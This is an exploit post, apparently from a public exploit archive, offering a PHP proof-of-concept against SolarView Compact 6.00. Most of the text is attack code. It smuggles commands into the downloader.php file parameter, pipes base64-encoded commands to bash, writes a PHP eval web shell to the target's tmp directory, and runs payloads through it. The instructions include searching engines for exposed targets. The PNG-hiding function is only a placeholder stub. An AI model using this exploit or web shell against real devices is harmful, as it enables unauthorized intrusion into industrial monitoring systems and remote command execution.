=============================================================================================================================================
| # Title     : SolarView Compact 6.00 Code Injection Vulnerability                                                                         |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |
| # Vendor    : https://www.contec.com/                                                                                                     |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 112 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php

class SolarViewExploit {
    private $targetUri;
    private $webshellName;
    private $postParam;
    private $timeout;

    public function __construct($targetUri, $timeout = 40) {
        $this->targetUri = rtrim($targetUri, '/');
        $this->timeout = $timeout;
    }

    public function uploadWebshell($webshell = null) {
        // Randomize file name if option WEBSHELL is not set
        $this->webshellName = $webshell ?? $this->generateRandomFileName();

        $this->postParam = $this->generateRandomString(8);
        
        // Inject PHP payload into the PLTE chunk of a PNG image to hide the payload
        $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";
        $pngWebshell = $this->injectPhpPayloadPng($phpPayload);

        if ($pngWebshell === null) {
            return null;
        }

        // Encode webshell data and write to file on the target at the tmp directory for execution
        $payload = base64_encode($pngWebshell);
        $cmd = "echo {$payload}|base64 -d >tmp/{$this->webshellName}";
        return $this->executeCommand($cmd);
    }

    public function executePhp($cmd) {
        $payload = base64_encode($cmd);
        return $this->sendRequest('POST', "/tmp/{$this->webshellName}", [
            $this->postParam => $payload
        ]);
    }

    public function executeCommand($cmd) {
        // Encode payload with base64 to ensure proper execution
        $payload = base64_encode($cmd);
        $cmd = "echo {$payload}|base64 -d|bash";
        return $this->sendRequest('GET', '/downloader.php', [
            'file' => ";{$cmd};.zip"
        ]);
    }

    public function check() {
        // Checking if the target is vulnerable by echoing a randomised marker
        echo "Checking if {$this->targetUri} can be exploited.\n";
        $marker = $this->generateRandomString(16);
        $res = $this->executeCommand("echo {$marker};cat /opt/svc/version");

        if ($res && $res['code'] == 200 && strpos($res['body'], $marker) !== false) {
            if (preg_match('/SolarView Compact ver\.\d\.\d\d/', $res['body'], $matches)) {
                return "Vulnerable: " . $matches[0];
            }
        }
        return 'Safe: No valid response received from the target.';
    }

    public function exploit($payload) {
        echo "Executing payload on {$this->targetUri}.\n";
        $res = $this->uploadWebshell();

        if (!$res || $res['code'] !== 200) {
            throw new Exception('Web shell upload error.');
        }

        $this->executePhp($payload);
    }

    private function sendRequest($method, $uri, $params) {
        $url = $this->targetUri . $uri;
        $options = [
            'http' => [
                'method' => $method,
                'header' => 'Content-Type: application/x-www-form-urlencoded',
                'timeout' => $this->timeout,
                'content' => http_build_query($params)
            ]
        ];

        $context = stream_context_create($options);
        $response = @file_get_contents($url, false, $context);
        $code = isset($http_response_header[0]) ? intval(substr($http_response_header[0], 9, 3)) : 0;

        return [
            'code' => $code,
            'body' => $response
        ];
    }

    private function injectPhpPayloadPng($phpPayload) {
        // Here you would implement the logic to inject the PHP payload into a PNG file.
        // This is a placeholder implementation.
        return $phpPayload; // Modify this to return the actual PNG with embedded PHP payload.
    }

    private function generateRandomFileName($length = 16) {
        return bin2hex(random_bytes($length / 2)) . '.php';
    }

    private function generateRandomString($length) {
        return bin2hex(random_bytes($length / 2));
    }
}

// Example of usage
$targetUri = 'http://target-ip'; // Replace with the actual target URL
$exploit = new SolarViewExploit($targetUri);
echo $exploit->check();
$exploit->exploit('whoami'); // Replace with your payload


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================